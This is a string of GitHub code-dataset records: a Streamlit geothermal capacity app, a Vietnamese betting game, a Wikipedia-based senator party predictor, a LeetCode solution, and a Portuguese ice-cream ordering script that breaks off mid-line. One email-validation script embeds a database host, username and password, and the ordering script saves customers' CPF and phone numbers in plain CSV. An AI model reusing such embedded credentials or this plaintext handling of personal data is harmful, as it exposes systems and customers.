density\ncol1.write('Power Density (MWe/km2)')\ncol2.write(PowerDens_P90)\ncol3.write(round(np.exp(powerdens_nu),1))\ncol4.write(PowerDens_P10)\n\n# Row 3 - Range of power capacity\ncol1.write('Power Capacity (MWe)')\n\nP90_MWe = prob_df.iloc[9,1]\ncol2.write(round(P90_MWe,1))\n\nP50_MWe = prob_df.iloc[49,1]\ncol3.write(round(P50_MWe,1))\n\nP10_MWe = prob_df.iloc[89,1]\ncol4.write(round(P10_MWe,1))\n\n#\n# Plot cumulative confidence curve\n#\nst.write('')\n\n# User input field for x axis max limit\ncola, colb = st.columns(2)\nx_max = float(cola.text_input(\"Maximum MWe for the cumulative confidence plot below\", 500))\n\n# Plotly plot setup\nfig = px.bar(\n data_frame = prob_df, \n y='Cumulative confidence (%)', \n x='Expected development size (MWe)', \n orientation='h', \n range_x=[0,x_max])\n\nst.plotly_chart(fig)\n\n# -------------------------------------------------------------------------\n# Power capacity - Show/hide full results summary and downloadable results \n# -------------------------------------------------------------------------\n\nst_ex_AdvancedOutput = st.expander(label=\"Detailed output and downloads\") # Make an expander object\n\nwith st_ex_AdvancedOutput: # Make these results hidden until expanded\n ### Text output ###\n st.markdown(\"___\")\n #st.write(\"## Computation outputs \")\n # Display the table, only every 10th row, and hide the index column to make it pretty\n st.table(prob_df[prob_df.index%10==9].assign(hideIndex='').set_index('hideIndex'))\n\n st.write(\"Calculate nu and sigma for area > 250 degC (the mean and variance in log units required for specifying lognormal distributions)\", area_nu)\n st.write(\"Area sigma\", area_sigma)\n \n # Calculate nu and sigma for power density (the mean and variance in log units required for specifying lognormal distributions)\n st.write(\"Calculate nu and sigma for power density (the mean and variance in log units required for specifying lognormal distributions)\")\n st.write(\"Power density nu \",powerdens_nu)\n st.write(\"Power density sigma \", powerdens_sigma)\n \"capacity_sigma\", capacity_sigma\n \"capacity_nu\", capacity_nu\n\n st.write(\"### Click to download results\")\n\n # Note, new versions of streamlit have a built in download button\n # If the current version ever brakes, consider switching to the built-in\n # Link below, scroll down slightly from there.\n # https://docs.streamlit.io/en/stable/api.html#display-interactive-widgets\n \n if st.button('Build Confidence-curve CSV for download'):\n tmp_download_link = download_link(prob_df, 'cum_conf_curve.csv', 'CSV built! Click here to download your data!')\n st.markdown(tmp_download_link, unsafe_allow_html=True)\n\n if st.button('Build parameter CSV for download'):\n tmp_download_link_params = download_link(param_df, 'parameter_values.csv', 'CSV built! Click here to download your data!')\n st.markdown(tmp_download_link_params, unsafe_allow_html=True)\n\n st.markdown(\"___\")\n\n# ----------\n# App footer\n# ----------\n\nst.markdown(\"___\")\n\nst.write(\"\") \n\nst.write(\"Made with ❤️ at the [SWUNG 2021 geothermal hack-a-thon](https://softwareunderground.org/events/2021/5/13/geothermal-hackathon)\")\nst.write(\"See the [github repo](https://github.com/Geothermal-Resource-Capacity/Power-Density) for project information and contributors\")\n","repo_name":"Geothermal-Resource-Capacity/Power-Density","sub_path":"streamlit/Power-Density_streamlit.py","file_name":"Power-Density_streamlit.py","file_ext":"py","file_size_in_byte":18126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"39405740630","text":"import random\nimport os\n\ndef random_number(): \n return random.randint(1, 2) \n\ntienvnd = 500000\nbankvnd = 0\ncauhoi = \"Bạn có muốn tiếp tục không ?\"\nluachon = \"0. Không || 1. Có\"\nlichsu = []\nwhile True:\n print(\"Số dư của bạn hiện tại là:\",tienvnd)\n # Chọn điều kiện chẵn lẻ\n print(\"Mời chọn chẵn hoặc lẻ:\")\n print(\"1. Lẻ || 2. Chẵn\")\n print(\"Chọn:\")\n chon = int(input())\n print(\"Con số random ra là: \",random_number())\n if chon == 1:\n print(\"Bạn chọn lẻ\")\n elif chon == 2:\n print(\"Bạn chọn chẵn\")\n else:\n while True:\n print(\"Vui lòng chỉ chọn 1 hoặc 2\")\n print(\"Chọn:\")\n chon = int(input())\n if chon == 1 or chon == 2: \n break\n # Cải tiến khi chọn đúng or sai\n if(chon == random_number()):\n print(\"Chúc mừng bạn chọn đúng ^_^\")\n tienvnd += 50000\n bankvnd = tienvnd\n lichsu.append(bankvnd)\n print(\"Lịch sử giao dịch của bạn:\",lichsu)\n else:\n print(\"Rất tiếc, bạn chọn sai :(\")\n tienvnd -= 50000\n bankvnd = tienvnd\n lichsu.append(bankvnd)\n print(\"Lịch sử giao dịch của bạn:\",lichsu)\n \n print(cauhoi)\n print(luachon) \n x = int(input())\n if x == 0:\n break\n else:\n os.system(\"cls\")\n\n\n\n\n","repo_name":"bachsykhang/gamechanlepython","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12483639592","text":"# Import the necessary modules\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport wikipedia\r\nfrom nltk.tokenize import RegexpTokenizer\r\n\r\n# Change the working directory to the script's directory\r\nos.chdir('C:\\\\Users\\\\Adeet Patel\\\\Google Drive\\\\Documents\\\\Education\\\\University\\\\Clubs\\\\HackCville\\\\Skills Course - Node\\\\Projects\\\\Web Scraping')\r\n\r\n# Import the list of senators and political parties, and create two separate dataframes: one for Democrats and one for Republicans\r\nsenators = pd.read_csv('Senator List.csv')\r\ndemocrats = senators[senators['Party'] == 'Democrat']\r\nrepublicans = senators[senators['Party'] == 'Republican']\r\n\r\n# Download each senator's article content via web scraping, using the Wikipedia API\r\n# Create two lists - pages_R and pages_D - which contain the article content for each Republican and Democrat senator, respectively\r\n\r\nprint('Downloading Republican senator data...')\r\npages_R = []\r\nfor senator in republicans.iloc[:, 0]:\r\n page = wikipedia.page(senator)\r\n pages_R.append(page.content)\r\n print(senator)\r\nprint('')\r\n\r\nprint('Downloading Democrat senator data...')\r\npages_D = []\r\nfor senator in democrats.iloc[:, 0]:\r\n page = wikipedia.page(senator)\r\n pages_D.append(page.content)\r\n print(senator)\r\nprint('')\r\n\r\n###############################################################\r\n\r\n# Create a dataset containing each Republican senator's name and their respective article\r\ndataset_R = []\r\nfor i in range(0, len(republicans)):\r\n dataset_R.append([republicans.iloc[i][0], pages_R[i]])\r\n \r\ndataset_R = pd.DataFrame(dataset_R, columns = ['Senator Name', 'Article'])\r\n\r\n# Calculate the number of instances of the word \"Republican\" and \"Democrat\" in the article to predict which political party a Republican senator is in\r\n# Also count variations in those words, such as \"republicans\", \"democrats\", and \"democratic\"\r\n# The entire article was converted to lowercase in order to avoid case-sensitivity (e.g. otherwise, \"republican\" and \"Republican\" would be considered two different words)\r\ncounts_R = []\r\ncounts_D = []\r\nfor i in range(0, len(republicans)):\r\n article = dataset_R.iloc[i][1]\r\n tokenizer = RegexpTokenizer(r'\\w+')\r\n article_words = []\r\n for word in tokenizer.tokenize(article):\r\n article_words.append(word.lower())\r\n counts_R.append(article_words.count('republican') + article_words.count('republicans'))\r\n counts_D.append(article_words.count('democrat') + article_words.count('democrats') + article_words.count('democratic'))\r\n\r\n# Add the word counts to the dataset\r\ndataset_R[\"# of 'Republican'\"] = counts_R\r\ndataset_R[\"# of 'Democrat'\"] = counts_D\r\n \r\n# Since the words in the articles have already been counted, the articles themselves are no longer necessary, and so they can be deleted\r\ndataset_R = dataset_R.drop(columns = 'Article')\r\n\r\n###############################################################\r\n\r\n# Create a dataset containing each Democrat senator's name and their respective article\r\ndataset_D = []\r\nfor i in range(0, len(democrats)):\r\n dataset_D.append([democrats.iloc[i][0], pages_D[i]])\r\n \r\ndataset_D = pd.DataFrame(dataset_D, columns = ['Senator Name', 'Article'])\r\n\r\n# Calculate the number of instances of the word \"Republican\" and \"Democrat\" in the article to predict which political party a senator is in\r\n# Also count variations in those words, such as \"republicans\", \"democrats\", and \"democratic\"\r\n# The entire article was converted to lowercase in order to avoid case-sensitivity (e.g. otherwise, \"republican\" and \"Republican\" would be considered two different words)\r\ncounts_R = []\r\ncounts_D = []\r\nfor i in range(0, len(democrats)):\r\n article = dataset_D.iloc[i][1]\r\n tokenizer = RegexpTokenizer(r'\\w+')\r\n article_words = []\r\n for word in tokenizer.tokenize(article):\r\n article_words.append(word.lower())\r\n counts_R.append(article_words.count('republican') + article_words.count('republicans'))\r\n counts_D.append(article_words.count('democrat') + article_words.count('democrats') + article_words.count('democratic'))\r\n\r\n# Add the word counts to the dataset\r\ndataset_D[\"# of 'Republican'\"] = counts_R\r\ndataset_D[\"# of 'Democrat'\"] = counts_D\r\n\r\n# Since the words in the articles have already been counted, the articles themselves are no longer necessary, and so they can be deleted\r\ndataset_D = dataset_D.drop(columns = 'Article')\r\n\r\n###############################################################\r\n\r\n# This is essentially a machine learning classification model\r\n# Predict each senator's political party based on how frequent the words \"Republican\" and \"Democrat\" (including their variations) appear in the code.\r\n# If \"Republican\" appears more frequently than \"Democrat\", the party is predicted as Republican, and vice versa\r\n# If both words are equally frequent, the senator's political party cannot be determined, and thus in that case, the model returns NaN\r\n\r\n# Make predictions for Republican senators\r\npredicted_R = []\r\nfor i in range(0, len(dataset_R)):\r\n if dataset_R.iloc[i][1] > dataset_R.iloc[i][2]:\r\n predicted_R.append('Republican')\r\n elif dataset_R.iloc[i][1] == dataset_R.iloc[i][2]:\r\n predicted_R.append(np.nan)\r\n else:\r\n predicted_R.append('Democrat')\r\n\r\n# Add the predicted parties to the dataset\r\ndataset_R['Predicted Party'] = predicted_R\r\n\r\n# Make predictions for Democrat senators\r\npredicted_D = []\r\nfor i in range(0, len(dataset_D)):\r\n if dataset_D.iloc[i][1] > dataset_D.iloc[i][2]:\r\n predicted_D.append('Republican')\r\n elif dataset_D.iloc[i][1] == dataset_D.iloc[i][2]:\r\n predicted_D.append(np.nan)\r\n else:\r\n predicted_D.append('Democrat')\r\n\r\n# Add the predicted parties to the dataset\r\ndataset_D['Predicted Party'] = predicted_D\r\n\r\n# Count the number of true and false political party predictions\r\n# pred_DD represents the number of senators that are actually Democrats and were predicted to be Democrats (correct result)\r\n# pred_DR represents the number of senators that are actually Democrats and were predicted to be Republicans (false prediction)\r\n# pred_RD represents the number of senators that are actually Republicans and were predicted to be Democrats (false prediction)\r\n# pred_RR represents the number of senators that are actually Republicans and were predicted to be Republicans (correct result)\r\n\r\npred_DD = 0\r\npred_DR = 0\r\npred_RD = 0\r\npred_RR = 0\r\n\r\nfor entry in dataset_D['Predicted Party']:\r\n if entry == 'Democrat':\r\n pred_DD += 1\r\n elif entry == 'Republican':\r\n pred_DR += 1\r\n\r\nfor entry in dataset_R['Predicted Party']:\r\n if entry == 'Democrat':\r\n pred_RD += 1\r\n elif entry == 'Republican':\r\n pred_RR += 1\r\n\r\n# Create a confusion matrix, which shows the distribution of true and false predictions, and compute the overall accuracy rate of the model\r\n\r\nconfusion_matrix = np.matrix([[pred_DD, pred_DR], [pred_RD, pred_RR]])\r\nsuccess = (pred_DD + pred_RR) / (pred_DD + pred_DR + pred_RD + pred_RR) * 100\r\nprint(confusion_matrix)\r\nprint('')\r\nprint('Prediction Success: ' + str(round(success, 2)) + '%')\r\n\r\n###############################################################\r\n\r\n# Create a scatterplot of the results\r\n# Points show true predictions, and Xs show false predictions\r\n\r\nplt.figure()\r\n# Actual democrats, predicted democrats\r\nplt.scatter(dataset_D[\"# of 'Republican'\"][dataset_D['Predicted Party'] == 'Democrat'], dataset_D[\"# of 'Democrat'\"][dataset_D['Predicted Party'] == 'Democrat'], c = 'blue', marker = '.')\r\n\r\n# Actual democrats, predicted republicans\r\nplt.scatter(dataset_D[\"# of 'Republican'\"][dataset_D['Predicted Party'] == 'Republican'], dataset_D[\"# of 'Democrat'\"][dataset_D['Predicted Party'] == 'Republican'], c = 'blue', marker = 'X')\r\n\r\n# Actual republicans, predicted democrats\r\nplt.scatter(dataset_R[\"# of 'Republican'\"][dataset_R['Predicted Party'] == 'Democrat'], dataset_R[\"# of 'Democrat'\"][dataset_R['Predicted Party'] == 'Democrat'], c = 'red', marker = 'X')\r\n\r\n# Actual republicans, predicted republicans\r\nplt.scatter(dataset_R[\"# of 'Republican'\"][dataset_R['Predicted Party'] == 'Republican'], dataset_R[\"# of 'Democrat'\"][dataset_R['Predicted Party'] == 'Republican'], c = 'red', marker = '.') \r\n\r\nplt.xlabel('# of Instances of \"Republican\"')\r\nplt.ylabel('# of Instances of \"Democrat\"')\r\nplt.title(\"Predicting a Senator's Political Party Based on Word Frequency\")","repo_name":"adeet1/hc-node","sub_path":"projects/web-scraping/political-party-prediction.py","file_name":"political-party-prediction.py","file_ext":"py","file_size_in_byte":8472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29497373106","text":"'''\n给定一个无重复元素的数组 candidates 和一个目标数 target ,找出 candidates 中所有可以使数字和为 target 的组合。\n\ncandidates 中的数字可以无限制重复被选取。\n\n说明:\n\n所有数字(包括 target)都是正整数。\n解集不能包含重复的组合。 \n示例 1:\n\n输入: candidates = [2,3,6,7], target = 7,\n所求解集为:\n[\n [7],\n [2,2,3]\n]\n示例 2:\n\n输入: candidates = [2,3,5], target = 8,\n所求解集为:\n[\n  [2,2,2,2],\n  [2,3,3],\n  [3,5]\n]\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/combination-sum\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n'''\n\nclass Solution:\n def combinationSum_1(self, candidates: [int], target: int) -> [[int]]:\n #未剪枝\n def backtrack(nums, path, tar):\n if sum(path) > tar:\n return\n elif sum(path) == tar:\n res.append(path[:])\n return\n for i in range(len(nums)):\n path.append(nums[i])\n backtrack(nums[i:], path, tar)\n path.pop()\n\n nums = candidates\n res = []\n tar = target\n backtrack(nums, [], tar)\n\n return res\n\n def combinationSum_2(self, candidates: [int], target: int) -> [[int]]:\n #剪枝,加速\n def backtrack(i, path, tar):\n if tar == 0:\n res.append(path[:])\n return\n for j in range(i,len(nums)):\n #利用变量tar纪录每次选择前的差量,来判断选择与否\n if tar - nums[j] >= 0:\n path.append(nums[j])\n backtrack(j, path, tar - nums[j])\n path.pop()\n\n nums = candidates\n res = []\n tar = target\n backtrack(0, [], tar)\n\n return res\n\n#测试\ncandidates = [2,3,5]\ntarget = 8\n\nres = Solution().combinationSum_2(candidates,target)\nprint(res)\n\n","repo_name":"Da1anna/Data-Structed-and-Algorithm_python","sub_path":"leetcode/其它题型/回溯/组合总和.py","file_name":"组合总和.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37821814995","text":"import pandas as pd\nimport pymssql as psq\nimport psycopg2.extras\nfrom email_validate import validate, validate_or_fail\nimport email_validate.exceptions as eex\nimport time\nfrom progress.bar import IncrementalBar\n\n# Соединяемся с базой стека\nmes_conn = psq.connect(server='192.168.9.10', user='LUBCHANSKIY', password='789456', database='Magadan_stack', charset='utf8')\n\n# Функция запроса е-маил физиков\ndef email_fizlic(s_conn):\n cursor = s_conn.cursor()\n sql_srting = \"SELECT лс.Номер лицевой, св.Примечание email FROM stack.Свойства св join stack.[Лицевые счета] лс ON лс.ROW_ID = св.[Счет-Параметры] where [Виды-Параметры]=177\"\n cursor.execute(sql_srting)\n row = cursor.fetchone()\n data = []\n while row:\n data.append([row[0], row[1].encode('windows-1251').decode()])\n row = cursor.fetchone() \n return data\n\n# Функция запроса е-маил юриков\ndef email_ulorg(s_conn):\n cursor = s_conn.cursor()\n cursor.execute(\"SELECT Название, орг.email FROM stack.[Организации] орг where email is not null and email != ''\")\n row = cursor.fetchone()\n data = []\n while row:\n data.append([row[0].encode('ISO-8859-1').decode('windows-1251'), row[1]]) # Перекодируем строчку со странной кодировкой принятой с БД\n row = cursor.fetchone() \n return data\n\n# Запрашиваем таблички e-mail физиков и юриков\nfiz_email_list = email_fizlic(mes_conn)\nul_email_list = email_ulorg(mes_conn)\n\n# Функция проверки e-mail адресов\ndef valid_email(email):\n try:\n validate_or_fail(\n email_address=email,\n check_format=True,\n check_blacklist=False,\n check_dns=True,\n dns_timeout=10,\n check_smtp=True,\n smtp_debug=False\n )\n except eex.DomainNotFoundError:\n return 'Адрес домена не найден'\n except eex.NoNameserverError:\n return '' # Почему то ругается на многие нормальные адреса, поэтому отключил\n except eex.DNSTimeoutError:\n return 'Истекло время ожидания при запросе сервера имен.'\n except eex.DNSConfigurationError:\n return 'Сервер имен настроен неправильно.'\n except eex.NoMXError:\n return 'Сервер имен не содержит записей MX для домена.'\n except eex.NoValidMXError:\n return 'Сервер имен перечисляет записи MX для домена, но ни одна из них не является допустимой.'\n except eex.AddressFormatError:\n return 'Формат адреса не соответствует требованиям'\n except eex.DomainBlacklistedError:\n return 'Адрес домена в черном списке!'\n except eex.SMTPError:\n return 'Ошибка доставки по адресу, адрес не существует'\n else:\n return ''\n \n\n# Проверяем физиков\nemail_errors = []\nbar = IncrementalBar('Countdown', max = len(fiz_email_list))\nfor email_ls in fiz_email_list:\n res = valid_email(email_ls[1])\n if res != '':\n email_errors.append([email_ls[0], email_ls[1], res])\n bar.next()\nbar.finish()\nemail_df = pd.DataFrame(email_errors)\n\n\n# Проверяем юриков\nul_email_errors = []\nbar = IncrementalBar('Countdown', max = len(ul_email_list))\nfor email_ls in ul_email_list:\n if ';' in email_ls[1]:\n spl_res = email_ls[1].split(';')\n for eml in spl_res:\n res = valid_email(eml)\n if res != '':\n ul_email_errors.append([email_ls[0], eml, res])\n elif ',' in email_ls[1]:\n spl_res = email_ls[1].split(',')\n for eml in spl_res:\n res = valid_email(eml)\n if res != '':\n ul_email_errors.append([email_ls[0], eml, res])\n else:\n res = valid_email(email_ls[1])\n if res != '':\n ul_email_errors.append([email_ls[0], email_ls[1], res])\n bar.next()\nbar.finish() \nulemail_df = pd.DataFrame(ul_email_errors)\n\n# Запихиваем все в Excel\nsh_name_fl = 'Ошибки физиков'\nsh_name_ul = 'Ошибки юриков'\nwriter = pd.ExcelWriter('email_error.xlsx', engine='xlsxwriter')\n\nemail_df.to_excel(writer, sheet_name=sh_name_fl, index=False)\nulemail_df.to_excel(writer, sheet_name=sh_name_ul, index=False)\n\nwriter.save()\nwriter.close()\n\n","repo_name":"VRaptor555/my-apps","sub_path":"mes/email_valid.py","file_name":"email_valid.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23012178703","text":"from responses.standard_response_body import StandardResponseBody\nfrom tokens import controllers as token_controllers\n\n\nasync def validate_token(token):\n return StandardResponseBody(\n True, \"Valid token\", token.token_value\n )\n\n\n\nasync def refresh_token(token):\n res = await token_controllers.refresh_token_by_token(token)\n #print(res)\n if res:\n return StandardResponseBody(\n True, \"Token refreshed\", res.token_value\n )\n return StandardResponseBody(\n False, \"Token not refreshed\"\n )","repo_name":"jaisal1311/fastapi-dev","sub_path":"tokens/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73430000720","text":"# chamar pedido\nimport time\n\n\n\n# ganhar desconto\nfrom selenium.webdriver.common.alert import Alert\n\n\ndef ganhardesconto(d):\n limpar()\n nomeupper = ''\n escrever('GANHAR DESCONTO [1]SIM [2]NÃO')\n desconto = int(input(''))\n cpflimpo = ' '\n ddd = 1\n tel = 1\n if desconto == 2:\n return novopedido(nomeupper, cpflimpo, ddd, tel)\n\n if desconto == 1:\n limpar()\n nomec = ''\n while len(nomec) < 3:\n escrever('NOME: ')\n nomec = input('')\n\n # upper\n nomeupper = nomec.upper()\n\n cpflimpo = \"\"\n while (len(cpflimpo) < 10) or len(cpflimpo) > 11:\n escrever('CPF:')\n cpflimpo = str(input(''))\n\n if len(cpflimpo) == 10:\n cpflimpo = \"0\" + cpflimpo\n\n ddd = \"\"\n while len(ddd) != 2:\n escrever('DDD:')\n ddd = str(input(''))\n\n tel = \"\"\n while len(tel) != 9:\n escrever('TELEFONE:')\n tel = str(input(''))\n\n # importar data\n from datetime import datetime\n now = datetime.now()\n\n # conctenar minutus horas dia mes ano\n data = (str(now.minute) + \":\" + str(now.hour) + \";\" + str(now.day) + \"/\" + str(now.month) + \"/\" + str(now.year))\n\n # linha para salvar\n linhacliente = (cpflimpo + \";\" + nomeupper + \";\" + ddd + \";\" + tel + \";\" + data + \"\\n\")\n\n # abrir ou criar arquivo\n arquivo = open('cliente.csv', 'a',encoding=\"utf8\", newline=\"\")\n\n # escrever linha\n arquivo.write(\"%s\" % linhacliente)\n\n # fechar\n arquivo.close()\n\n novopedido(nomeupper,cpflimpo, ddd, tel)\n\n if desconto == 2:\n limpar()\n return novopedido(1)\n\n\n\n\ndef desconto_para_clientes_cadastrados(cpflimpo, total):\n if len(cpflimpo) >= 10:\n descontototal = total / 20# cinco % de desconto\n return descontototal\n else:\n return 0\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#pedido na tela\ndef chamarpedido(d):\n limpar()\n escrever('digite O PEDIDO: ')\n chamarpedido = int(input(''))\n limpar()\n escrever(str(chamarpedido))\n escrever(str(chamarpedido) + ' CONCLUIDO [1] CANCELAR [0]')\n opchamar = 1\n opchamar = str(input(''))\n if opchamar == '0':\n return menu()\n\n return pedidotela(str(chamarpedido))\n\n# chamar pedido com musica\ndef pedidotela(texto):\n limpar()\n\n import pygame\n pygame.init()\n limpar()\n pygame.mixer.music.load('ex01.mp3')\n limpar()\n pygame.mixer.music.play()\n # pygame.event.wait()\n limpar()\n tamanhotexto = len(texto) + 20\n print('#' * tamanhotexto)\n print(\" \" * 10, texto)\n print('#' * tamanhotexto)\n import time\n time.sleep(5)\n\n# limpar tela\ndef limpar():\n return print(\"\\n\" * 100)\n\n# novo pedido\ndef novopedido(nome,cpflimpo, ddd, tel):\n limpar()\n\n # mais um comvalor 1 para fazer o primeiro pedido\n maisum = 1\n\n total = 0\n\n if len(nome) < 1:\n nomeok = 0\n while nomeok == 0:\n escrever(\"NOME DO CLIENTE: \")\n nomeup = input(\"\")\n nome = nomeup.upper()\n limpar()\n escrever(nome)\n escrever('CONTINUAR [1]')\n escrever('ALTERAR NOME? [0]')\n opnome = int(input(''))\n limpar()\n if opnome == 1:\n nomeok = 1\n\n\n\n dic={}\n lista=list()\n # mais um com o valor 1 para iniciar\n maisum = 1\n while maisum == 1:\n\n if len(str(lista)) > 2:\n\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n print('JÁ ADICIONADO ')\n\n for add in lista:\n minhalinha = ''\n add.split(';')\n for um in add:\n minhalinha = minhalinha+str(um)\n\n\n\n remover =', )\\', ( '\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover[i], '')\n\n minhalinha = minhalinha.replace('|||', '')\n minhalinha = minhalinha.replace('||', '')\n minhalinha = minhalinha.replace('|', ' | ')\n\n print(minhalinha)\n\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n\n\n # ecolher sabor\n SABOR = addproduto(1)\n\n\n\n #escrever(\"SABORES: \\n [1] CHOCOLATE \\n [2] MISTO \\n [3] CREME\\n [4] triplo chocolate Kopenhagen\\n [5] Kit Kat\")\n\n # quantidade de sorvetes reverente ao sabo\n QTDO = 1\n escrever(\"QUANTIDADE: \")\n QTDO = (int(input(\"\")))\n \n\n\n\n\n\n\n\n\n # cobertura extra só por categoria/grupo de produtos\n #######################################################\n\n # cobertura extra\n #escrever('COBERTURA EXTRA [1] SIM [2] NÃO')\n #coberturaextra=int(input(''))\n #if coberturaextra == 1:\n # total = total + 2 # mais 2 reais de cobertura extra\n # #abrirfoto('e')\n # extra = ' COM COBERTURA EXTRA'\n\n #else:\n # extra = 'SEM COBERTURA EXTRA'\n extra = ''\n\n\n # cobertura extra só por categoria/grupo de produtos\n #######################################################\n\n\n\n\n\n\n # preço total do pedido\n descontodef = calcularprecototal(QTDO, SABOR)\n total = total + descontodef\n linhadoproduto = str(SABOR)\n valorli = linhadoproduto.split('|')\n valorreal = float(valorli[1])\n valorreal = QTDO * valorreal\n total = total + valorreal\n\n\n\n\n\n\n\n\n\n\n # lista de sabor e quantidade\n um = str(QTDO)\n lista.append(\"|| {} | {} | {} ||\".format(str(um), str(SABOR), str(extra)))\n\n\n\n\n # limpar tela\n limpar()\n\n\n\n # mostrar na tela os ja add\n if len(str(lista)) > 2:\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n print('JÁ ADICIONADO ')\n\n\n\n for add in lista:\n minhalinha = ''\n add.split(';')\n for um in add:\n minhalinha = minhalinha+str(um)\n\n remover = ', )\\', ( '\n for i in range(0, len(remover)):\n minhalinha = minhalinha.replace(remover[i], '')\n\n minhalinha = minhalinha.replace('|||', '')\n minhalinha = minhalinha.replace('||', '')\n minhalinha = minhalinha.replace('|', ' | ')\n minhalinha = minhalinha.replace(' | ', '?')\n minhalinha = minhalinha.replace('|', '')\n minhalinha = minhalinha.replace('?', ' | ')\n print(minhalinha)\n #print('\\n')\n #print('TOTAL: '+str(total))\n print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')\n\n\n\n\n escrever(\"mais um [1]\")\n escrever(\"finalizar [2]\")\n maisum = int(input(''))\n\n\n if maisum == 2:\n maisum = 0\n\n # limpar tela\n limpar()\n\n\n\n\n\n\n\n\n\n # importar data\n from datetime import datetime\n\n # agora\n now = datetime.now()\n\n # conctenar minutus horas dia mes ano\n horahora = str(now.hour)\n if len(horahora)<2:\n horahora ='0'+str(now.hour)\n\n minutominuto=str(now.minute)\n if len(minutominuto)<2:\n minutominuto ='0'+str(now.minute)\n\n\n data = (horahora + \":\" + minutominuto + \";\" + str(now.day) + \"/\" + str(now.month) + \"/\" + str(now.year))\n\n\n # mostrar o pedido completo para o usuario para confirmar pedido/venda\n\n m = int(now.minute)\n h = int(now.hour)\n d = int(now.day)\n me = int(now.month)\n an = int(now.year)\n numeropedidovariavel = str(numeropedido(m, h, d, me, an))\n escrever('NOME: ' + nome)\n listalinha = str(lista)\n listalinha=listalinha.replace(' ','')\n listalinha=listalinha.replace(']','')\n listalinha=listalinha.replace('[','')\n listalinha=listalinha.replace('\\\"','')\n listalinha=listalinha.replace('||','')\n listalinha=listalinha.replace('|','?')\n listalinha=listalinha.replace(',','')\n\n listalinha=listalinha.replace('(','')\n listalinha=listalinha.replace('\\'','')\n listalinha = listalinha.replace(')', '\\n')\n listalinha = listalinha.replace(' | ', '?')\n listalinha = listalinha.replace('|', '')\n listalinha = listalinha.replace('?', ' | ')\n \n\n\n\n\n subtotal = total\n descontodefcpf = desconto_para_clientes_cadastrados(cpflimpo, total)\n total = total-descontodefcpf\n\n\n\n\n\n print('PEDIDO')\n escrever(str(listalinha))\n escrever('SUBTOTAL: R$ ' + str(\"%.2f\" % subtotal))\n escrever('DESCONTO: R$ ' + str(\"%.2f\" % descontodefcpf))\n escrever('TOTAL: R$ ' + str(\"%.2f\" % total))\n\n\n\n escrever(str())\n\n\n\n # conferir se esta correto\n opfinal = '1'\n escrever(\"CONTINUAR [ENTER] CANCELAR [0]\")\n opfinal = input(\"\")\n\n if opfinal == \"\":\n opfinal = '1'\n if opfinal == '0':\n menu()\n\n # limpar tela\n limpar()\n\n\n # escrever na tela\n escrever('PEDIDO: '+numeropedidovariavel+' SALVO!')\n\n\n # espera\n time.sleep(1)\n\n\n\n # ferificar cpf\n if len(cpflimpo) < 3:\n cpflimpo = 'SEM CPF'\n\n\n\n pedidoitem = ''\n\n\n for item in lista:\n pedidoitem = pedidoitem + str(item)\n\n\n\n tsub=str(subtotal)\n tdesc=str(descontodefcpf)\n ttotal=str(total)\n\n\n\n\n\n # linha para salvar em arquivo\n linha = (\"p\"+numeropedidovariavel +';'+str(cpflimpo)+';'+ nome +';' + data + ';'+str(tsub)+ ';' +str(tdesc)+ ';' +str(ttotal) + \"\\n\")\n\n\n\n # abrir ou criar arquivo\n arquivo = open('pedidosimples.csv', 'a', newline=\"\", encoding=\"utf8\")\n\n # escrever linha\n arquivo.write(\"%s\" % linha)\n\n # fechar\n arquivo.close()\n\n\n\n # chamar pdf\n gerarpdfdetalhado(nome, numeropedidovariavel, lista,tsub, tdesc,total, data, ddd, tel)\n\n\n\n\n # string da lista\n listavariavel = str(lista)\n\n\n cpf = str(cpflimpo)\n\n\n \n # SUBSTITUIR UM SPAÇO | POR NUMERO DO PEDIDO\n # remover os caracteres da string\n\n\n\n remover = \"123456789\"\n for i in range(0, len(remover)):\n for x in range(0, 10, 1):\n strremove = str(i)+(' ')\n listavariavel = listavariavel.replace(strremove,'p' + str(numeropedidovariavel) + '|' + str(cpf) +'|' +str(QTDO))\n strremove = str(i)+str(x)+' '\n listavariavel = listavariavel.replace(strremove,'p'+str(numeropedidovariavel) + '|' + str(cpf) +'|'+ str(QTDO))\n\n # | POR ESPAÇO E SIRGULA POR ESPAÇO\n remover = \",\"\n for i in range(0, len(remover)):\n listavariavel = listavariavel.replace(remover[i], \"\")\n\n # remover os caracteres da string\n remover = \"\\'\\\"][,)( \"\n for i in range(0, len(remover)):\n listavariavel = listavariavel.replace(remover[i], \"\")\n\n # remover os caracteres da string\n remover = \"||||\"\n listavariavel = listavariavel.replace(remover, \"\\n\")\n\n # remover os caracteres da string\n remover = \"||\"\n listavariavel = listavariavel.replace(remover, \"\")\n\n\n # pular linha \n listavariavel = '\\n'+listavariavel\n\n # remover os caracteres da string\n remover = \"|p\"\n listavariavel = listavariavel.replace(remover, \"p\")\n\n # remover os caracteres da string\n remover 